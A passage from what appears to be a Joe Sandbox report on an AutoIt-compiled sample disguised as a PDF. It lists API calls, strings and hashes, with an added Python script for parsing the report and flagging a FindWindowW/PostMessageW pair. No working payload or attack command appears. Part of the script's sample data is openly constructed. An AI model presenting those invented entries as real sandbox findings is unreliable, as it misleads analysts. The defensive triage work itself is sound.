                                                     • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: LengthMessageSendTextWindow
                                                    • String ID: edit
                                                    APIs
                                                    • _memset.LIBCMT ref: 003852D5
                                                    • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 003852F4
                                                    Strings
                                                    Similarity
                                                    • API ID: InfoItemMenu_memset
                                                    • String ID: 0
                                                    APIs
                                                    • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00394DF5
                                                    • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00394E1E
                                                    Strings
                                                    Similarity
                                                    • API ID: Internet$OpenOption
                                                    • String ID: <local>
                                                    APIs
                                                    • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 003737A7
                                                    • ___raise_securityfailure.LIBCMT ref: 0037388E
                                                    Strings
                                                    Similarity
                                                    • API ID: FeaturePresentProcessor___raise_securityfailure
                                                    • String ID: (@
                                                    APIs
                                                    • inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0039A84E
                                                    • htons.WSOCK32(00000000,?,00000000), ref: 0039A88B
                                                    Strings
                                                    Similarity
                                                    • API ID: htonsinet_addr
                                                    • String ID: 255.255.255.255
                                                    APIs
                                                    • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 0037B7EF
                                                    Strings
                                                    Similarity
                                                    • API ID: MessageSend
                                                    • String ID: ComboBox$ListBox
                                                    APIs
                                                    • SendMessageW.USER32(?,00000180,00000000,?), ref: 0037B6EB
                                                    Strings
                                                    Similarity
                                                    • API ID: MessageSend
                                                    • String ID: ComboBox$ListBox
                                                    APIs
                                                    • SendMessageW.USER32(?,00000182,?,00000000), ref: 0037B76C
                                                    Strings
                                                    Similarity
                                                    • API ID: MessageSend
                                                    • String ID: ComboBox$ListBox
                                                    APIs
                                                    Strings
                                                    Similarity
                                                    • API ID: __calloc_crt
                                                    • String ID: "@
                                                    APIs
                                                    • LoadImageW.USER32(00340000,00000063,00000001,00000010,00000010,00000000), ref: 00344048
                                                    • EnumResourceNamesW.KERNEL32(00000000,0000000E,003867E9,00000063,00000000,75C10280,?,?,00343EE1,?,?,000000FF), ref: 003B41B3
                                                    Strings
                                                    Similarity
                                                    • API ID: EnumImageLoadNamesResource
                                                    • String ID: >4
                                                    APIs
                                                    Strings
                                                    Similarity
                                                    • API ID: ClassName_wcscmp
                                                    • String ID: #32770
                                                    APIs
                                                    • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 0037A63F
                                                      • Part of subcall function 003613F1: _doexit.LIBCMT ref: 003613FB
                                                    Strings
                                                    Similarity
                                                    • API ID: Message_doexit
                                                    • String ID: AutoIt$Error allocating memory.
                                                    APIs
                                                    • GetSystemDirectoryW.KERNEL32(?), ref: 003BACC0
                                                    • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 003BAEBD
                                                    Strings
                                                    Similarity
                                                    • API ID: DirectoryFreeLibrarySystem
                                                    • String ID: WIN_XPe
                                                    APIs
                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 003A86A2
                                                    • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 003A86B5
                                                      • Part of subcall function 00387A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00387AD0
                                                    Strings
                                                    Similarity
                                                    • API ID: FindMessagePostSleepWindow
                                                    • String ID: Shell_TrayWnd
                                                    APIs
                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 003A86E2
                                                    • PostMessageW.USER32(00000000), ref: 003A86E9
                                                      • Part of subcall function 00387A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00387AD0
                                                    Strings
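                                                    The two entries that share API String ID 529655941-2988720461 are distinct compiled functions (different Opcode IDs and Instruction IDs) with the same API-and-string signature: a direct FindWindowW("Shell_TrayWnd") immediately followed by PostMessageW, with Sleep reached only through the subcall at 00387A58. The following script is an added example, not part of the Joe Sandbox report or of the sample; it parses this report layout into records, distinguishes direct calls from "Part of subcall function" calls, flags the FindWindowW/PostMessageW pair, and groups functions by API String ID so near-identical functions can be triaged together. The embedded sample text is constructed from the entries above; the second entry's API lines and the whole third entry are assumed for illustration (the report above cuts off before the second entry's APIs).

```python
"""Parse Joe Sandbox function-summary entries ('Similarity' / 'APIs' blocks) and
flag the FindWindowW("Shell_TrayWnd") -> PostMessageW call pair.
Added example; not code from Joe Sandbox or from the analysed sample."""
import re
from collections import defaultdict
from dataclasses import dataclass, field
from typing import Optional


@dataclass
class ApiCall:
    api: str
    module: str
    args: tuple
    ref: str
    subcall_of: Optional[str] = None  # address of the callee when the call sits in a subcall


@dataclass
class FunctionEntry:
    api_id: str = ""
    string_id: str = ""
    api_string_id: str = ""
    opcode_id: str = ""
    instruction_id: str = ""
    calls: list = field(default_factory=list)


# Constructed sample in the report's own layout. Entry 1 mirrors the report;
# entry 2's API lines and all of entry 3 (zeroed IDs) are assumed for illustration.
SAMPLE = """\
Memory Dump Source
• Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
Similarity
• API ID: FindMessagePostSleepWindow
• String ID: Shell_TrayWnd
• API String ID: 529655941-2988720461
• Opcode ID: 8f04d1d87f9db10745301e602af0025562a04ac60f6ff79eb4925479d880a2c9
• Instruction ID: 70816d907cf2c38a67fa651dcc2f08a81d29116e26b6bd7fbdc1c26cac72292e
APIs
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 003A86E2
• PostMessageW.USER32(00000000), ref: 003A86E9
  • Part of subcall function 00387A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00387AD0
Strings
Memory Dump Source
• Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
Similarity
• API ID: FindMessagePostSleepWindow
• String ID: Shell_TrayWnd
• API String ID: 529655941-2988720461
• Opcode ID: 4c5bfe24dd13b932ec3aedb2dc320138522e8d0bf64d9c384de85e3fbb266005
• Instruction ID: 69ad23def51579e4cc26caeee245d4c4a1c2737a57b0a98f2c0cd1088cb930af
APIs
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 003A8700
• PostMessageW.USER32(00000000), ref: 003A8707
Strings
Memory Dump Source
• Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
Similarity
• API ID: FindWindow
• String ID: Shell_TrayWnd
• API String ID: 0000000000-2988720461
• Opcode ID: 0000000000000000000000000000000000000000000000000000000000000000
APIs
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 003A8800
Strings
"""

FIELD_RE = re.compile(
    r"^\s*•\s*(?P<key>API ID|String ID|API String ID|Opcode ID|Instruction ID):\s*(?P<val>.*)$"
)
CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
SECTIONS = {"Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity", "APIs", "Strings"}


def parse_entries(text):
    """Split report text into FunctionEntry records; one entry starts at each 'Memory Dump Source'."""
    entries, cur, section = [], None, None
    for line in text.splitlines():
        s = line.strip()
        if s in SECTIONS:
            section = s
            if s == "Memory Dump Source":
                cur = FunctionEntry()
                entries.append(cur)
            continue
        if cur is None:
            continue
        if section == "Similarity":
            m = FIELD_RE.match(line)
            if m:
                setattr(cur, m.group("key").lower().replace(" ", "_"), m.group("val").strip())
        elif section == "APIs":
            m = CALL_RE.match(line)
            if m:
                raw = m.group("args")
                args = tuple(a.strip() for a in raw.split(",")) if raw else ()
                cur.calls.append(ApiCall(m.group("api"), m.group("mod"), args,
                                         m.group("ref").upper(), m.group("sub")))
    return entries


def has_tray_window_post(entry):
    """True when a direct FindWindowW(Shell_TrayWnd, ...) is immediately followed by PostMessageW.
    Calls reached only via a subcall are ignored so the pair must be in this function's own body."""
    direct = [c for c in entry.calls if c.subcall_of is None]
    return any(a.api == "FindWindowW" and a.args and a.args[0] == "Shell_TrayWnd" and b.api == "PostMessageW"
               for a, b in zip(direct, direct[1:]))


def group_by_api_string_id(entries):
    """Map API String ID -> Opcode IDs, so functions with one signature but distinct code are triaged together."""
    groups = defaultdict(list)
    for e in entries:
        groups[e.api_string_id].append(e.opcode_id)
    return dict(groups)


if __name__ == "__main__":
    es = parse_entries(SAMPLE)
    for e in es:
        print(e.opcode_id[:16], [(c.api, c.ref, c.subcall_of) for c in e.calls], has_tray_window_post(e))
    print(group_by_api_string_id(es))
```

                                                    The subcall distinction matters for triage: Joe Sandbox lists Sleep under the entry because it is reached through 00387A58, not because this function calls it, so a rule keyed on "FindWindowW then PostMessageW" should look only at direct calls.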
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: FindMessagePostSleepWindow
                                                    • String ID: Shell_TrayWnd
                                                    • API String ID: 529655941-2988720461
                                                    • Opcode ID: 4c5bfe24dd13b932ec3aedb2dc320138522e8d0bf64d9c384de85e3fbb266005
                                                    • Instruction ID: 69ad23def51579e4cc26caeee245d4c4a1c2737a57b0a98f2c0cd1088cb930af
                                                    • Opcode Fuzzy Hash: 4c5bfe24dd13b932ec3aedb2dc320138522e8d0bf64d9c384de85e3fbb266005
                                                    • Instruction Fuzzy Hash: 24D0C9713853186BE26A67709C4BFC6BA189B49B11F510825B749EA2D0C9A4F950C758